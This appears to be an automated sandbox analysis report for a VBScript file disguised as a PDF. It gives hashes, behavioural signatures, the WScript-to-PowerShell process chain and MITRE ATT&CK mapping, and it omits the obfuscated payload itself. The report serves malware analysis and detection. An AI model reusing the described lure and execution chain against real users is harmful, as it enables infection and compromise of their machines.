Analysis
max time kernel: 149s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 18-11-2024 02:00
Static task: static1
Behavioral task: behavioral1
  Sample: 202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs
  Resource: win10v2004-20241007-en
General
Target: 202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs
Size: 16KB
MD5: e6c723d6a40150466aa011158c68e591
SHA1: f18348ee740329c6cb706123b34151dde9197b50
SHA256: 969d4f51528c1a62de42fd8dfc0efaf09b1857426add53376a3e2db14456a173
SHA512: c9c85c17c329267d8dbed3441baa63c85cbd0abbad858dfd86632de8cd97b461d8f36c4b4fbd126712cd2664ba1e6bd2eece30fb090b9ff462ac4c052b204256
SSDEEP: 384:X+7h2tykhjtUXkNaaYtydrEVql1UnqCrP0z9CW6fz83W4u8b:GUtbto31+rOqcnqCrMZuA3nb
Malware Config
Signatures
Blocklisted process makes network request (1 IoCs)
  flow  pid   Process
  3     3004  WScript.exe
Command and Scripting Interpreter: PowerShell
  pid   Process
  2840  powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2840  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2840  powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process      procid_target
  PID 3004 wrote to memory of 2840  3004  WScript.exe  30
  PID 3004 wrote to memory of 2840  3004  WScript.exe  30
  PID 3004 wrote to memory of 2840  3004  WScript.exe  30
Processes
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID: 3004
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 3004)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by a heavily obfuscated PowerShell script passed as a single argument (omitted here)
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2840
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 70KB
MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1: 1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b